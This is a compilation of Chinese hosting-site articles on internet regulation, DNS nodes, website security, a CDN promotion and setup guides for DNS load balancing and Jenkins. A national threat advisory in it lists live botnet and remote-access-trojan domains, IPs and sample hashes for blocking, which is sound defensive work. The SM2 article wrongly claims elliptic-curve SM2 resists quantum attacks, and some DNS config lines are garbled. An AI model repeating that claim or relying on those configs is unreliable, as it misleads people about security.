家,会同电信主管部门取消违法网站许可或备案、关闭违法网站 2899 家,移送司法机关相关案件线索 377 件。有关网站依据用户服务协议关闭各类违法违规账号群组 20 余万个。 各级网信部门结合开展“清朗”“网剑”“剑网”“网上扫黄打非”等专项行动中,严厉处置一批违法违规网站平台。其中包括依法关闭“乐易新闻”“中社新闻”“三农调研中心官网”“农民工网”“塞上江南”等违规从事互联网新闻信息服务的网站;  关闭仿冒“河北省住房和城乡建设厅”“长安大学地质工程与测绘学院”“和田新闻”“南开大学滨海学院招生网”“上海招考热线”等一批侵权网站;  关闭“财经热搜”“比特币挖矿”“苹果ID解锁”“共鑫繁荣”“冰点代刷网”等一批诈骗网站;  关闭“金顶棋牌官网”“梦想冰雪”“宝乐娱乐”“乐潮娱乐城”“杏耀娱乐”等一批游戏赌博网站;  关闭“糖果轻娱”“心之恋”“ 163 小说网”“哈哈畅娱”“低俗小说”等一批传播淫秽色情信息网站。 相关网站平台依据用户服务协议关闭“货币当局”“路易贾”“首席剥皮”“蓝山一线”“耕雪读梅花”“湘声在线V”等一批违法违规账号,切实履行企业主体责任,维护网络信息传播秩序。 此外,与就网络生态问题频发,淫秽色情等有害信息反弹反复等问题,各级网信部门通过约谈整改、行政处罚、公开曝光等手段,依法加大网信行政执法力度。国家网信办持续对省级网信办加强指导,包括: 针对新浪网对用户发布违法违规信息未尽审查义务,持续传播炒作导向错误、低俗色情、虚假不实等违法有害信息问题,北京市网信办约谈相关负责人,责令其全面深入整改,整改期间对“新浪博客”“新浪看点”平台自行暂停更新 1 个月,对“新浪新闻”“新浪博客”APP下架 1 个月; 针对视觉中国在其发布的多张图片中刊发敏感有害信息标注,破坏网络生态等问题,天津市网信办约谈相关负责人,责令网站切实履行主体责任,全面清查历史存量信息,强化内容审核管理,并对网站运营主体汉华易美(天津)图像技术有限公司罚款 30 万元; 针对阅文集团旗下起点中文网发布传播低俗色情小说等违法违规问题,上海市网信办联合市“扫黄打非”办、市新闻出版局约谈运营企业负责人,责令其全面深入整改,整改期间对“都市频道”“异术超能栏目”“女生网频道”“N次元栏目”自行暂停更新 7 天。 #### 国家网络与信息安全信息通报中心通报一批境外恶意网址和恶意IP 近期,中国国家网络与信息安全信息通报中心发现一批境外恶意网址和恶意IP,有多个具有某大国政府背景的境外黑客组织,利用这些网址和IP持续对中国和其他国家发起网络攻击。这些恶意网址和IP都与特定木马程序或木马程序控制端密切关联,网络攻击类型包括建立僵尸网络、网络钓鱼、勒索病毒等,以达到窃取商业秘密和知识产权、侵犯公民个人信息等目的,对中国国内联网单位和互联网用户构成重大威胁,部分活动已涉嫌刑事犯罪。相关恶意网址和恶意IP归属地主要涉及:美国、波兰、荷兰、保加利亚、土耳其、日本等。主要情况如下: 一、恶意地址信息 (一)恶意地址:j.foxnointel.ru 关联IP地址:172.235.51.77   归属地:美国/加利福尼亚州/洛杉矶 威胁类型:僵尸网络 病毒家族:fodcha 描述:这是一种DDoS僵尸网络木马,通过N-Day漏洞和Telnet、SSH弱口令进行传播。攻击者可控制被感染的“肉鸡”(联网终端)对互联网上的其它系统或设备发起DDoS攻击,导致关键信息基础设施或重要网络应用瘫痪,干扰破坏国计民生和社会公共秩序。 (二)恶意地址:a.foxnointel.ru 关联IP地址:92.223.30.136   归属地:美国/加利福尼亚州/洛杉矶 威胁类型:僵尸网络 病毒家族:fodcha 描述:这是一种DDoS僵尸网络木马,通过N-Day漏洞和Telnet、SSH弱口令进行传播。攻击者可控制被感染的“肉鸡”(联网终端)对互联网上的其它系统或设备发起DDoS攻击,导致关键信息基础设施或重要网络应用瘫痪,干扰破坏国计民生和社会公共秩序。 (三)恶意地址:93.157.106.238 归属地:保加利亚/索非亚州/索非亚 威胁类型:僵尸网络 病毒家族:mirai 描述:这是一种Linux僵尸网络病毒,通过网络下载、漏洞利用、Telnet和SSH暴力破解等方式进行扩散,入侵成功后可对目标网络系统发起分布式拒绝服务(DDos)攻击。 (四)恶意地址:LOADINGBOATS.DYN 关联IP地址:89.36.160.67   归属地:波兰/马佐夫舍省/华沙 威胁类型:僵尸网络 病毒家族:catddos 描述:Catddos病毒家族主要通过IoT设备的N-Day漏洞进行传播,已公开样本包括CVE-2023-46604、CVE-2021-22205等,该恶意地址是相关病毒家族近期有效活跃的回连地址。 (五)恶意地址:95.214.27.194 归属地:荷兰/北荷兰省/阿姆斯特丹 威胁类型:僵尸网络 病毒家族:moobot 描述:这是一种Mirai僵尸网络的变种,常借助各种IoT设备漏洞例如CVE-2015-2051、CVE-2018-6530、CVE-2022-26258、CVE-2022-28958等进行入侵,攻击者在成功入侵设备后将下载MooBot的二进制文件并执行,进而组建僵尸网络并可能发起分布式拒绝服务(DDos)攻击。 (六)恶意地址:dovahnoh1.duckdns.org 关联IP地址:88.227.180.194    归属地:土耳其/阿达纳省/塞伊汉 威胁类型:网络后门 病毒家族:Asyncrat 描述:该恶意地址关联多个Asyncrat病毒家族样本,部分样本的MD5值为0afe92d70093444605979eafa2afca4d和24d5b4b63fe3f30c9a399f0c76196104。该网络后门采用C#语言编写,主要功能包括屏幕监控、键盘记录、密码获取、文件窃取、进程管理、开关摄像头、交互式SHELL,以及访问特定URL等。该木马通过移动介质、网络钓鱼等方式进行传播,现已发现多个关联变种,部分变种主要针对民生领域的联网系统。 (七)恶意地址:134.122.138.230:7021 归属地:日本/东京都/东京 威胁类型:网络后门 病毒家族:SilverFox 描述:该恶意地址关联SilverFox病毒家族样本,其MD5值为bfc4b93fade57ead4fa15d37aef94760,相关样本通过钓鱼邮件进行传播,经变种伪装成企业内部应用软件诱骗用户下载点击。     二、排查方法 (一)详细查看分析浏览器记录以及网络设备中近期流量和DNS请求记录,查看是否有以上恶意地址连接记录,如有条件可提取源IP、设备信息、连接时间等信息。 (二)在本单位应用系统中部署网络流量检测设备进行流量数据分析,追踪与上述网络和IP发起通信的设备网上活动痕迹。 (三)如果能够成功定位到遭受攻击的联网设备,可主动对这些设备进行勘验取证,进而组织技术分析。 三、处置建议 (一)对所有通过社交平台或电子邮件渠道接收的文件和链接保持高度警惕,重点关注其中来源未知或不可信的情况,不要轻易信任或打开相关文件。 (二)及时在威胁情报产品或网络出口防护设备中更新规则,坚决拦截以上恶意网址和恶意IP的访问。 (三)向有关部门及时报告,配合开展现场调查和技术溯源。 #### 国家顶级域名西藏解析节点正式上线提供服务 北京,2024年12月11日 —— 中国互联网络信息中心(CNNIC)今日宣布,国家顶级域名西藏解析节点(以下简称“西藏节点”)在拉萨正式上线,标志着西藏自治区在信息基础设施建设方面迈出了重要一步。 在西藏自治区通信管理局的大力支持下,CNNIC与中国电信集团有限公司西藏自治区分公司联合建设的西藏节点,将为当地互联网用户提供更快速、更稳定的域名解析服务。该节点的日均解析量高达1700万次,显著提升了域名解析效率,域名解析访问时延从52.87毫秒大幅降低至7.27毫秒。 西藏节点的上线,不仅增强了国家顶级域名在西藏地区的服务保障能力,还将进一步推动西藏地区数字经济与实体经济的深度融合,为高新数字产业的高质量发展提供强有力的支撑。 CNNIC表示,西藏节点的建成和投入使用,是优化国家顶级域名解析节点布局、提升地方信息基础设施高质量发展的重要举措。随着西藏节点的加入,西藏地区互联网用户将享受到更快的访问速度,这将为西藏地区的信息化建设和数字经济发展注入新的动力。 西藏节点的上线,是继其他地区节点建设之后的又一里程碑,展现了中国在提升国家顶级域名服务能力、推动区域数字经济发展方面的决心和成就。随着更多地区节点的建设和优化,中国在全球互联网架构中的地位和影响力将持续增强。 #### 国家顶级域名解析服务深圳交换中心节点上线,大幅提升广东用户访问互联网速度 12 月 20 日消息,据中国互联网络信息中心 CNNIC 12 月 19 日消息,为进一步优化国家顶级域名解析节点布局,助力地方信息基础设施高质量发展,中国互联网络信息中心联合国家(深圳・前海)新型互联网交换中心完成深圳互联解析节点(以下简称“深圳交换中心节点”)建设工作,经试运行后,已于近期正式上线。 CNNIC 表示,该节点作为首个与国内新型互联网交换中心合作建设的解析节点,开创了国家顶级域名解析节点建设的新模式,对丰富国内新型互联网交换中心的功能和提升其域名解析服务水平具有重要意义。、 深圳交换中心节点日均解析量为 7300 万次,其中 95.99% 的访问量来自广东省内,大幅提升了广东地区有关用户访问互联网服务的速度,域名解析访问时延由 26.16 毫秒降至 5.16 毫秒,进一步提升了广东地区的国家顶级域名解析服务水平和服务保障能力。 此前报道,12 月 11 日,中国互联网络信息中心联合中国电信集团有限公司西藏自治区分公司共同建设的国家顶级域名西藏解析节点在拉萨上线提供服务。西藏节点日均解析量为 1700 万次,域名解析访问时延由 52.87 毫秒降至 7.27 毫秒,大幅提升了西藏地区互联网用户访问国家顶级域名解析服务的速度。 #### 国密SSL证书到底是什么?跟一般的SSL证书有什么不同? 国密SSL证书是一种采用我国自主研发的SM2公钥算法体系的加密证书,支持SM2,SM3,SM4等国产密码算法及国密SSL安全协议。SM2算法基于更加安全先进的椭圆曲线密码机制,在国际标准的ECC椭圆曲线密码理论基础上进行改进而来,其加密强度更高。国密SSL证书可以满足政府机构、事业单位、大型国企、金融银行等行业客户的国产化改造和国密算法合规需求。 与普通的SSL证书相比,国密SSL证书的主要区别在于采用了不同的加密算法体系。普通SSL证书通常采用RSA或DHE等非国密算法,而国密SSL证书使用的是国产SM2算法。此外,国密SSL证书的SM2密钥长度为256位,虽然比一般的SSL证书的密钥长度要短,但由于SM2算法的特性,仍然能够提供相当的安全性。 国密SSL证书还具有较强的抗量子计算攻击能力。随着量子计算技术的进步,传统加密算法的安全性受到威胁,而国密SSL证书采用的SM2算法在抵御量子计算攻击方面具有优势。 总的来说,国密SSL证书是在保证安全性的同时,更符合我国网络安全需求的一种加密证书。 #### 国庆长假 注意保护好网站安全 随着国庆长假的到来,许多企业和组织可能会减少网络安全值守人员,这往往会导致防护措施的减弱。在这段时间内,网站可能面临多种安全威胁,包括但不限于DDoS攻击、Web攻击、数据泄露等。为了确保网站在假期期间的安全稳定运行,以下是一些可能的安全问题及其解决办法: 网站可能面临的安全问题 DDoS攻击:分布式拒绝服务攻击会通过大量请求压垮服务器,导致网站无法访问 Web攻击:包括SQL注入、跨站脚本(XSS)、文件包含等,攻击者可能会利用这些手段窃取数据或破坏网站。 数据泄露:黑客可能会利用假期期间安全防护的松懈,窃取敏感数据,如用户信息、财务数据等。 系统漏洞:未及时更新的系统和软件可能存在已知漏洞,攻击者可能会利用这些漏洞进行攻击。 解决办法 使用专业的云安全服务:推荐使用百度云防护或京东云星盾等专业服务来增强网站安全。这些服务通常提供DDoS攻击防御、Web应用防火墙(WAF)、数据加密等功能。 2.定期更新和打补丁:确保所有系统、应用程序和插件都是最新版本,以防止已知漏洞被利用。 3.强化访问控制:限制对敏感数据和关键系统的访问,确保只有授权人员才能访问。 4.数据备份:做好定期备份数据,并确保备份数据的安全,以防万一发生数据泄露或丢失。 5.监控和响应:即使在假期期间,也要确保有人监控网络安全事件,并准备好快速响应任何安全事件。 通过采取上述措施,可以大大降低国庆长假期间网站遭受攻击的风险,确保网站的安全和稳定运行。 With the arrival of the National Day holiday, many businesses and organizations may reduce their cybersecurity staff, which can often lead to a weakening of protective measures. During this period, websites may face a variety of security threats, including but not limited to DDoS attacks, web attacks, and data breaches. To ensure the safe and stable operation of websites during the holiday period, here are some potential security issues and their solutions: Security Issues Websites May Face: DDoS Attacks: Distributed Denial of Service attacks can overwhelm servers with a flood of requests, making websites inaccessible. Web Attacks: Including SQL injection, Cross-Site Scripting (XSS), file inclusion, etc., attackers may use these methods to steal data or damage websites. Data Breaches: Hackers may take advantage of the lax security during the holiday to steal sensitive data, such as user information, financial data, etc. System Vulnerabilities: Systems and software that are not updated in time may have known vulnerabilities that attackers can exploit. Solutions: Use Professional Cloud Security Services: It is recommended to use professional services such as Baidu Cloud Protection or JD Cloud Star Shield to enhance website security. These services typically provide DDoS attack defense, Web Application Firewall (WAF), data encryption, and other features. Regular Updates and Patching: Ensure that all systems, applications, and plugins are up to date to prevent the exploitation of known vulnerabilities. Strengthen Access Control: Restrict access to sensitive data and critical systems, ensuring that only authorized personnel can access them. Data Backup: Regularly back up data and ensure the security of the backup data in case of data breaches or loss. Monitoring and Response: Even during the holiday period, ensure that someone monitors cybersecurity events and is prepared to respond quickly to any security incidents. By taking the above measures, the risk of websites being attacked during the National Day holiday can be greatly reduced, ensuring the security and stable operation of the websites. #### 国美创始人黄光裕被曝已出狱 国美概念股大涨 6月24日 消息:据北京商报报道,国美创始人黄光裕已于近日出狱,国美官方将于近日通过公告说明具体情况。据了解,6月24日将是国美零售所在港交所端午节休市前的最后一个工作日。同时,还有消息人士称,国美或将于今晚对外公布消息。 受此消息影响,国美零售涨幅超20%,国美金融科技涨幅已超60%。截至目前,国美零售涨幅达15.22%,股价为1.59港元。 今年4月,国美零售投资关系总监李虹在香港向媒体透露,国美零售创始人黄光裕将于明年出狱回归。 据悉, 2010 年,国美创始人黄光裕因非法经营罪、内幕交易罪和单位行贿罪被判处有期徒刑 14 年入狱,经过几次减刑,应执行刑期调整至 2021 年 2 月 16 日。但如果加上刑期过半可申请假释,以及年满 50 岁可申请保外就医,黄光裕很有可能会提前出狱。 #### 国际互联网安全日:谷歌分享 5 条网络安全小技巧 2 月 8 日消息,今天是一年一度的“国际互联网安全日(Safer Internet Day)”,这一宣传日的设立旨在推动互联网成为一个更安全、更美好的地方。 为了帮助每个人不断强化网络安全意识,养成良好的上网习惯,学会更好地在网上保护自己,在今年的国际互联网安全日,Google 分享了以下这些网络安全小技巧,一起来看看。 1. 不要重复使用密码,即使其强度很高 千万不要觉得设置一个复杂的长密码就可以高枕无忧。很多人都会有这种侥幸心理,觉得复杂的密码很安全,然而事实上,如果一直使用同一个密码,那么一旦某个账户被网络钓鱼攻陷,你的所有帐户就都将面临风险。 2. 确保系统和应用程序更新至最新版本 为了让自己的网络安全更有保障,你应该确保应用程序更新至最新版本,可以启用自动更新功能,或者在收到更新推送后尽快完成更新。 3. 注意防范网络诈骗 以下三条“黄金法则”能帮助你快速识破网络诈骗:第一,不要慌张,骗子往往会制造一种紧急的假象,来迷惑你的意识,这时不要着急,多提问题,以避免慌乱出错;第二,再三检查,要再三确认自己得到的信息并仔细研究,如果你接到了一通紧急电话 / 短信,先不急着回复,如果你收到了一封邮件,不要急着点开里面的链接,而应该直接登录对应的银行或政府部门的官方网站;第三,切勿付款,可信的个人或机构不会要求你当场支付费用,往往是骗子们才会催促你尽快支付,所以,如果你觉得支付方式十分可疑,不要犹豫,它很有可能就是一场诈骗。 4. 注意防范个人信息泄露 不要回复索取个人信息(例如密码、银行账户、信用卡号或出生日期)的可疑电子邮件、即时消息或弹出式窗口。即使消息来自您信任的网站(例如银行),也不要点击链接或回复消息,而是最好直接前往相应网站或应用登录您的帐号。正规网站和服务不会发送相关消息来要求你通过电子邮件提供密码或财务信息。 5. 在不使用时,锁定电子设备屏幕 “人走即锁屏”是个好习惯,我们在不使用电子设备时,都应该锁定它们的屏幕,以防泄露个人隐私。为了提高安全性,建议你为各种电子设备都设置自动锁屏。 Google 总结,无论在任何时间、地点和情境下使用网络和电子设备,都应该不忘以下原则: 重视密码,使用独立密码;确保软件更新至最新版本;学会判断信息的真假,在遇到网络钓鱼时采取措施避免威胁;注重保护隐私,不随意提供个人信息;注重保护个人设备的安全。 #### 国际刑警端了黑客常用 AVCheck 木马病毒测试平台 6 月 2 日消息,国际刑警发文,宣布成功关闭了一家名为“AVCheck”的木马病毒测试平台,该平台正如其名,主要供黑客们测试自己的木马病毒是否能被主流杀毒软件检测出来。 据悉,黑客们在付费后即可在相应平台上传自己的文件,平台会以匿名方式在 26 种杀毒引擎中对黑客上传的文件进行扫描,同时平台还能提供一系列域名 / IP 地址检测服务,帮助黑客们了解他们的 C2 服务器地址是否已被各大安全公司加入追踪名单。 已被各大安全公司加入追踪名单。 据国际刑警通报,警方在当地时间 5 月 27 日成功攻破 AVCheck 平台,关闭网站服务器并获得了平台的数据库,相应数据库中据称包含注册者用户名、电子邮箱、支付信息等数据。 国际刑警同时披露,上月(5 月)警方已成功摧毁了 7 个僵尸网络,查封了 300 台非法服务器和 650 个非法域名。 #### 图文解析百度索引量大降原因与解决办法 各位站长都知道索引量(或称收录量)是网站流量的基石,每天都会盯着百度搜索资源平台(原百度站长平台)提供的索引量工具查看。理论上说,索引量发生波动属于正常,但也不应掉以轻心。 那么,索引量发生变化后该如何追查原因呢?今天主机吧给站长分享百度官方的回答,看下图: 关于申诉,除了再一次播报申诉地址(http://ziyuan.baidu.com/feedback)外,我们给各位站长提个醒,在撰写申诉内容时应该尽量将问题描述具体,引用SEO爱好者痞子瑞的经验:“网站索引量异常,可以使用百度搜索资源平台(原百度站长平台)的索引量查询工具,一级一级的遍历一下自己网站的主要子域名或目录,以确定到底是哪个子域名或目录的索引量出现了异常。”“每个频道选取一些页面,在百度网页搜索中直接搜索这样页面的URL,以定位被删除快照网页的最小范围。”“然后在投诉内容中明确给出“病体”的URL,并附上相应的数据变动截图。”这样才便于处理投诉的百度工作人员快速寻找问题症结。 另外,站长们往往只有在索引量下降时心惊肉跳一把,在百度内部人员看来,索引量无缘无故大幅增长更应该警惕,应该检查一下:1、会不会是网站被黑客攻击后增加了大量垃圾网页2、会不会是Robost协议出了问题,导致大批保密页面被百度抓取3、大幅增加的url会不会占用有限的抓取配额,导致重要优质内容未被抓取 #### 图片外链、云存储平台贴图库宣布将暂停服务 6月11日 消息:近日,图片外链、云存储平台贴图库(tietuku.com)宣布将暂停服务。 贴图库称,自公告之日起15个工作日内,用户需将账号中的图片导出,具体位置为:控制台-》管理中心-》导出图片。 据介绍,贴图库是一个免费、高速、稳定、专业图片外链、专注图片云存储的平台,具体功能包括了:无限图片外链流量,数量、原图无损上传、无限图片云存储空间等。 以下为公告原文: 尊敬的各位贴图库用户: 由于不可抗拒的原因,贴图库可能暂停一段时间,在此感谢大家多年的陪伴。给你带来的不便,我代表贴图库全体工作人员,深表歉意:对不起,给您添麻烦了。 自公告之日起15个工作日内,请大家及时把各自账号中的图片保存到各自的电脑或服务器中,如因个人原因没有保存图片造成的损失,自行承担后果。请付费用户在页面右上角,依次点击 控制台-》管理中心-》导出图片,按要求填写导出图片链接的申请,我们会按提交时间顺序及时处理,并把图片链接发到你提供的邮箱中,请及时查收。 如有疑问,请拨打电话:0395-3366286或邮件联系 wleige@foxmail.com   那些把图片放在贴图库的站长们要有得忙了,所以哈,图片放哪都不如放自己家的服务器安全。 #### 图片网站流量非常大要如何省服务器带宽费? 最近主机吧接到一位做图片站的站长,一天流量就高达5T,流量高峰期的时候高达10T每天。如果用普通CDN的话,一年就10多万的流量费,而且有时候还会被DDOS攻击,购买DDOS防御价格相当昂贵,想问主机吧有什么好的介绍吗? 主机吧给他算了一笔帐,假如每天5T流量,一年就1825T流量,相当于差不多2P的流量。按百度智能云CDN流量包计算,1P流量活动价55000元,2P就11万,价格是相当昂贵的,这还只是普通流量,一但被DDOS攻击,防御价格更高。 如果流量在1T以下的,主机吧推荐使用百度云加速企业版,一年代理价才11000元,每天有1T流量,相当便宜。但像这位站长这样的,不适合。 主机吧就推荐使用了京东云星盾的包年包月套餐。 以基础版为例,一年才69600,代理价的话55680元,而且京东云星盾支持DDOS防御,web应用防火墙,性价比非常高,综合考虑后,客户购买了一个月试用,目前用得非常好。 如果站长您的业务也需要大量流量,需要防御的,可以联系主机吧。 #### 土巴兔域名备案真的快! 中午的时候主机帮刚说土巴兔的备案号没了,结果下午的时候人家直接备案过了。 注销备案跟重新备案只用了不到半天! 主机帮查了下原先土巴兔的备案号为粤ICP备08125558号 现在最新备案为粤ICP备2024290514号 审核时间为2024-08-02,也就是今天!而发现网友反馈时间为1点半左右,恢复访问为3点左右。 一个半小时从注销备案到重新备案,简直极速! 如何实现这么快呢?这得人在工信部现场注销备案,现场提交资料审核才有这速度吧。 中小企业网站备案要是有这速度,国内网站也不会这么没落了。 #### 在 Linux服务器上用 DNS 实现简单的负载均衡的方法 这篇文章主要介绍了在 Linux 上用 DNS 实现简单的负载均衡的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧DNS 轮询将多个服务器映射到同一个主机名,并没有为这里展示的魔法做更多的工作。如果你的后端服务器是由多台服务器构成的,比如集群化或者镜像的 Web 或者文件服务器,通过负载均衡器提供了单一的入口点。业务繁忙的大型电商在高端负载均衡器上花费了大量的资金,用它来执行各种各样的任务:代理、缓存、状况检查、SSL 处理、可配置的优先级、流量整形等很多任务。但是你并不需要做那么多工作的负载均衡器。你需要的是一个跨服务器分发负载的简单方法,它能够提供故障切换,并且不太在意它是否高效和完美。DNS 轮询和使用轮询的子域委派是实现这个目标的两种简单方法。DNS 轮询是将多台服务器映射到同一个主机名上,当用户访问 foo.example.com 时多台服务器都可用于处理它们的请求,使用的就是这种方式。当你有多个子域或者你的服务器在地理上比较分散时,使用轮询的子域委派就比较有用。你有一个主域名服务器,而子域有它们自己的域名服务器。你的主域名服务器将所有的到子域的请求指向到它们自己的域名服务器上。这将提升响应时间,因为 DNS 协议会自动查找最快的链路。DNS 轮询轮询和旅鸫鸟robins没有任何关系,据我相熟的图书管理员说,它最初是一个法语短语,ruban rond、或者 round ribbon。很久以前,法国政府官员以不分级的圆形、波浪线、或者直线形状来在请愿书上签字,以盖住原来的发起人。DNS 轮询也是不分级的,简单配置一个服务器列表,然后将请求转到每个服务器上。它并不做真正的负载均衡,因为它根本就不测量负载,也没有状况检查,因此如果一个服务器宕机,请求仍然会发送到那个宕机的服务器上。它的优点就是简单。如果你有一个小的文件或者 Web 服务器集群,想通过一个简单的方法在它们之间分散负载,那么 DNS 轮询很适合你。你所做的全部配置就是创建多条 A 或者 AAAA 记录,映射多台服务器到单个的主机名。这个 BIND 示例同时使用了 IPv4 和 IPv6 私有地址类:fileserv.example.com. IN A 172.16.10.10fileserv.example.com. IN A 172.16.10.11fileserv.example.com. IN A 172.16.10.12fileserv.example.com. IN AAAA fd02:faea:f561:8fa0:1::10fileserv.example.com. IN AAAA fd02:faea:f561:8fa0:1::11fileserv.example.com. IN AAAA fd02:faea:f561:8fa0:1::12Dnsmasq 在 /etc/hosts 文件中保存 A 和 AAAA 记录:172.16.1.10 fileserv fileserv.example.com172.16.1.11 fileserv fileserv.example.com172.16.1.12 fileserv fileserv.example.comfd02:faea:f561:8fa0:1::10 fileserv fileserv.example.comfd02:faea:f561:8fa0:1::11 fileserv fileserv.example.comfd02:faea:f561:8fa0:1::12 fileserv fileserv.example.com请注意这些示例都是很简化的,解析完全合格域名有多种方法,因此,关于如何配置 DNS 请自行学习。使用 dig 命令去检查你的配置能否按预期工作。将 ns.example.com 替换为你的域名服务器:$ dig @ns.example.com fileserv A fileserv AAA它将同时显示出 IPv4 和 IPv6 的轮询记录。子域委派和轮询子域委派结合轮询要做的配置会更多,但是这样有一些好处。当你有多个子域或者地理位置比较分散的服务器时,就应该去使用它。它的响应时间更快,并且宕机的服务器不会去响应,因此客户端不会因为等待回复而被挂住。一个短的 TTL,比如 60 秒,就能帮你做到。这种方法需要多台域名服务器。在最简化的场景中,你需要一台主域名服务器和两个子域,每个子域都有它们自己的域名服务器。在子域服务器上配置你的轮询记录,然后在你的主域名服务器上配置委派。在主域名服务器上的 BIND 中,你至少需要两个额外的配置,一个区声明以及在区数据文件中的 A/AAAA 记录。主域名服务器中的委派应该像如下的内容:ns1.sub.example.com. IN A 172.16.1.20ns1.sub.example.com. IN AAAA fd02:faea:f561:8fa0:1::20ns2.sub.example.com. IN A 172.16.1.21ns2.sub.example.com. IN AAA fd02:faea:f561:8fa0:1::21sub.example.com. IN NS ns1.sub.example.com.sub.example.com. IN NS ns2.sub.example.com.接下来的每台子域服务器上有它们自己的区文件。在这里它的关键点是每个服务器去返回它自己的 IP 地址。在 named.conf 中的区声明,所有的服务上都是一样的:zone "sub.example.com" {  type master;  file "db.sub.example.com";};然后数据文件也是相同的,除了那个 A/AAAA 记录使用的是各个服务器自己的 IP 地址。SOA 记录都指向到主域名服务器:; first subdomain name server$ORIGIN sub.example.com.$TTL 60sub.example.com IN SOA ns1.example.com. admin.example.com. (    2018123456  ; serial    3H      ; refresh    15      ; retry    3600000    ; expire)sub.example.com. IN NS ns1.sub.example.com.sub.example.com. IN A 172.16.1.20ns1.sub.example.com. IN AAAA fd02:faea:f561:8fa0:1::20; second subdomain name server$ORIGIN sub.example.com.$TTL 60sub.example.com IN SOA ns1.example.com. admin.example.com. (    2018234567  ; serial    3H      ; refresh    15      ; retry    3600000    ; expire)sub.example.com. IN NS ns1.sub.example.com.sub.example.com. IN A 172.16.1.21ns2.sub.example.com. IN AAAA fd02:faea:f561:8fa0:1::21接下来生成子域服务器上的轮询记录,方法和前面一样。现在你已经有了多个域名服务器来处理到你的子域的请求。再说一次,BIND 是很复杂的,做同一件事情它有多种方法,因此,给你留的家庭作业是找出适合你使用的最佳配置方法。在 Dnsmasq 中做子域委派很容易。在你的主域名服务器上的 dnsmasq.conf 文件中添加如下的行,去指向到子域的域名服务器:erver=/sub.example.com/172.16.1.20server=/sub.example.com/172.16.1.21server=/sub.example.com/fd02:faea:f561:8fa0:1::20server=/sub.example.com/fd02:faea:f561:8fa0:1::21然后在子域的域名服务器上的 /etc/hosts 中配置轮询。获取配置方法的详细内容和帮助,请参考这些资源: #### 在CentOS7上搭建Jenkins+Maven+Git持续集成环境的方法 这篇文章主要介绍了在CentOS7上搭建Jenkins+Maven+Git持续集成环境的方法,主机吧觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随主机吧过来看看吧 本文以部署 Spring boot + Maven 项目为例,使用码云作为代码托管仓库,在 CentOS 7 上搭建 Jenkins 持续集成环境。 1. 准备工作   1.1 安装 Java 环境 Jenkins 是基于 Java 开发的持续集成工具,需要在 Java 环境下运行。用下面命令查看系统是否已安装 Java: yum list installed | grep jdk 如果没有,使用 yum search 命令查找 openjdk 版本,选择合适的 jdk 进行安装: yum search openjdk yum -y install java-1.8.0-openjdk-devel 验证 Java 是否安装成功: java -version 1.2 安装 Maven 依次运行以下两条命令: wget http://repos.fedorapeople.org... -O /etc/yum.repos.d/epel-apache-maven.repo yum -y install apache-maven 验证 Maven 是否安装成功: mvn -v 1.3 安装 Git 直接通过 yum 安装,安装完成后查看版本验证是否安装成功: yum -y install git git --version 2. 安装和配置 Jenkins:   2.1 安装 Jenkins 依次运行以下三条命令: sudo wget https://pkg.jenkins.io/redhat... -O /etc/yum.repos.d/jenkins.repo sudo rpm --import https://pkg.jenkins.io/redhat... yum -y install jenkins 如果之前从 Jenkins 导入过 key,那么 rpm --import 将失败,因为已经有一个 key 了。忽略它,继续执行 install 即可。 2.2 启动 Jenkins   启动 Jenkins,并且设置开机自启动: systemctl start jenkins.service chkconfig jenkins on Jenkins 默认使用8080端口,访问以下链接即可看到 Jenkins 的 Web 界面: http://<服务器地址>:8080 如果无法访问,检查一下防护墙,是否有开放端口,或使用命令 netstat -ntulp 查看端口是否被占用。 2.3 进入 Jenkins 首次进入 Jenkins 需要输入管理员密码,使用以下命令查看初始密码: cat /var/lib/jenkins/secrets/initialAdminPassword 选择默认的 install suggested plugins 安装插件,等待安装完成后依照步骤创建用户,创建完成后即可登入。 2.4 配置 Jenkins 进入 Manage Jenkins -> Global Tool Configuration,依次配置 JDK、Git 和 Maven 路径。 2.4.1 查看 JDK 路径 使用 yum 安装的软件不会帮我们配置环境变量,直接使用命令echo $JAVA_HOME 是看不到路径的。 先用以下命令查看路径: which java 看到的结果是 /usr/bin/java ,但实际上这只是个软连接,并不是 JDK 真正的所在目录。 继续使用以下命令查看: ls -l /usr/bin/java 看到 /usr/bin/java 指向了 /etc/alternatives/java,很遗憾,还不是我们要找的真正路径。 继续追踪: ls -l /etc/alternatives/java 结果指向了 /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-1.el7_6.x86_64/jre/bin/java,不同版本的 JDK 目录名可能有些不同,这就是 JDK 真正所在的地方。 同理可获得 Maven 的所在路径。 2.4.2 安装和配置插件 进入 Manage Jenkins -> Manage Plugins,搜索并安装 Publish Over SSH 和 Maven Integration 两个插件, Git Plugins 插件已经默认安装上了,我们无需再安装。 配置 SSH 免密码登录 在配置插件之前,我们先在 Jenkins 服务器上生成密钥对。运行以下命令切换到 jenkins 用户: sudo su jenkins 如果无法切换,则打开 /etc/passwd 文件,找到 jenkins 那一行,将 /bin/fasle 改成 /bin/bash。 切换成功后,命令提示符的用户名可能是 bash-4.2$,想要正常显示用户名的话,先切换回 root 用户,执行以下操作: 编辑文件 vi ~/.bash_profile 加入语句 export PS1='[u@h W]$' 立即生效 source ~/.bash_profile 再切换到 jenkins 用户,就显示正常了。接下来运行以下命令生成密钥对: ssh-keygen -t rsa 一路按回车完成,会在 /var/lib/jenkins/.ssh/ 目录下生成 id_rsa 和 id_rsa.pub两个文件。 将 id_rsa.pub 文件里的内容追加到应用服务器上的 /root/.ssh/authorized_keys 文件末尾,每行一个 key,注意是应用服务器。重启应用服务器上的 ssh 服务: systemctl restart sshd.service 现在 Jenkins 可以免密码登录应用服务器了,以 jenkins 用户身份运行命令来测试一下: ssh root@<应用服务器地址> 首次连接会有确认提示,输入 yes 即可。这步很重要,如果第一次没有手动连接确认,Jenkins 会连不上。 配置 Public over SSH 插件 进入 Manage Jenkins -> Configure System,填写 Publish over SSH 设置。 Path to key:填写刚刚生成的 id_rsa 密钥文件的路径。 Name:服务名,随意填写。 HostName:应用服务器的 IP 地址或域名。 Username:登录应用服务器的用户身份。 Remote Directory:远程目录, 应用服务器上存放应用的目录,Jenkins 会把应用拷贝至此目录下。请确保此目录存在。 save~ 3. 部署 Maven 项目 点击 New Item 新建任务,随意输入任务名,选择 Maven project, ok。 在General,勾选 Discard old builds,可以设置最多保留构建文件多少天,和最多保留多少个构建文件,不然每次构建生成的文件都会保留,占用磁盘空间。 